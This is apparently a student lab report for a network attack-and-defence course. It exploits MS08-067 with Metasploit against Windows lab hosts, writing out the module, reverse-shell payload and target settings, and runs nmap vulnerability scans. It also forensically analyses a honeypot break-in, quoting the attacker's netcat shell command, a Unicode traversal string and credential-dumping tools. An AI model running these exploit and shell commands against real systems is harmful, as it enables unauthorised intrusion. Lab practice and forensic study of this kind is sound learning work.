20212935 2021-2022-2 《网络攻防实践》实践六

1 实验目的

熟悉Windows和linux系统结构和安全机制,学会攻击渗透和防御分析,学会漏洞修补。

2 实验环境

Kali、Winxp、Win2k。

3 实验内容

3.1动手实践Metasploit windows attacker

任务:

使用metasploit软件进行windows远程渗透统计实验

具体任务内容:

使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。

3.2取证分析实践:解码一次成功的NT系统破解攻击

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

(1)攻击者使用了什么破解工具进行攻击

(2)攻击者如何使用这个破解工具进入并控制了系统

(3)攻击者获得系统访问权限后做了什么

(4)我们如何防止这样的攻击

(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

3.3团队对抗实践:windows系统远程渗透攻击和分析

(1)分析攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)

(2)防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

4 实验过程

4.1实践Metasploit windows attacker:

(1)kali中输入命令行msfconsole进入启动msfconsole:

wps1

(2)输入命令行search ms08_067查看漏洞ms08_067详细信息:

wps2

(3)输入命令行use windows/smb/ms08_067_netapi进入漏洞所在文件

wps3

(4)输入命令行show options查看攻击此漏洞需要的设置

wps4

(5)输入命令行show payloads显示此漏洞的载荷

wps5

(6)选择第3个载荷进行攻击,输入命令行set payload generic/shell_reverse_tcp设置载荷、输入命令行set RHOST 192.168.200.124设置要攻击主机、输入命令行set LHOST 192.168.10.52设置本机

wps6

(7)输入命令行exploit进行攻击,出现会话连接即攻击成功

wps7

(8)输入命令行ipconfig/all查看靶机的IP攻击成功

wps8

(9)查看wireshark抓包,可以看到源地址为192.168.10.52 端口号为32905,目的地址为192.168.11.16 端口号为445。

wps9

(10)还可以看到攻击利用的漏洞有:针对SMB网络服务的漏洞、DCERPC解析器拒绝服务漏洞、SPOOLSS打印服务假冒漏洞

wps10

(11)查看wireshark抓包的TCP流,可以看到靶机中输入的命令行被抓取

wps11

4.2取证分析实践:解码一次成功的NT系统破解攻击

4.2.1 查看漏洞

(1)用wireshark打开snort-0204@0117.log文件,输入筛选条件命令ip.addr == 172.16.1.106 and http进行筛选:

wps12

(2)选择第37条追踪tcp流,找到特殊字符..%C0%AF..,查询后可知这是存在Unicode漏洞攻击。

wps13

(3)选择第149条数据进行追踪tcp流,可以发现有shell及cmd关键字符,查询可知这是存在RDS漏洞

wps14

wps15

4.2.2 如何破解并控制系统

(1)选择第313条数据追踪其tcp数据流,可以看到执行了很多次都没有成功,说明这次攻击是失败的。

wps16

(2)选择第1107条数据并追踪其tcp数据流,可以发现攻击者使用johna2k作为用户名,haxedj00作为密码,下载了nc.exe、pdump.exe、samdump.dll

wps17

(3)选择第1224条数据并追踪其tcp数据流,可以发现攻击者执行了cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe命令,连接了6969端口进入交互式控制阶段。

wps18

4.2.3 攻击者获得权限后做了什么

(1)以tcp.port==6969作为筛选条件,选择第1282条数据流并追踪其tcp数据流,可以发现攻击者修改了各种文件,删除了ftpcom等文件痕迹。

wps19

(2)选择第1361条数据并追踪其tcp数据流,可以发现攻击者利用了SQi注入在靶机系统下生成了一个文件。

wps20

(3)选择第2339条数据,追踪其数据流,可以发现ADD关键字符,查询可知这是提升权限。

wps21

4.2.4 如何防止这样的攻击

(1)为自己管辖的所有服务器升级

(2)为客户端下载使用于多种平台、多种语言环境的补丁包

(3)停止不必要的服务、关闭不必要的端口

4.2.5 是否发现攻击的是蜜罐网关

(1)选择第4238条数据,并追踪其tcp数据流可以发现此语句,说明发现了是蜜罐网关。

wps22

4.3团队对抗实践:windows系统远程渗透攻击和分析

4.3.1 实验环境:

作为攻击方

作为防守方

Kali

192.168.1.109

Win2k

192.168.1.114

Win2k

192.168.1.111

Kali

192.168.1.105

 

 

 

 

 

4.3.2作为攻击方

(1)查看是否能ping通对方:

wps23

(2)可以ping通,输入命令nmap --script=vuln -Pn 192.168.1.111查看对方是否存在漏洞,可以发现存在ms08-067.

wps24

(3)search ms08-067查看此漏洞

wps25

(4)输入命令行use windows/smb/ms08_067_netapi进入漏洞所在文件,输入命令行show options查看攻击此漏洞需要的设置,输入命令行set payload generic/shell_reverse_tcp设置载荷、输入命令行set RHOST 192.168.1.111设置要攻击主机、输入命令行set LHOST 192.168.1.109设置本机.

wps26

(5)输入run进行攻击,可以看到侵入对方,输入md 123、md dkl进行控制对方电脑。

wps27

(6)对方电脑打开后发现内部确实被新建了两个文件,说明此次攻击成功。

wps28

(7)抓包分析。

wps29

4.3.3作为被攻击方

(1)打开wireshark进行抓包,做为被攻击者接受攻击

(2)可以发现我的电脑被攻击者入侵,并在我的桌面建立了如下文件:

wps30

(3)分析抓包到的数据,可以看到源地址为192.168.1.105、端口号为38575,目的地址为192.168.1.114、端口为445

wps31

(4)选择此数据并追踪其tcp数据流,可以查看到攻击者对我的电脑进行的一系列操作指令。

wps32

5 实验中遇到的问题及解决方法

攻击时总是显示失败,也ping不通,后来发现两台设备没有连到同一局域网内,都改成桥接模式后可以ping通了!

6 实验感想

通过这一次内容丰富的实验,我对双方入侵攻击检测有了更深的了解。

posted @ 2022-04-23 20:58  dou嘚嘚嘚  阅读(93)  评论(0编辑  收藏  举报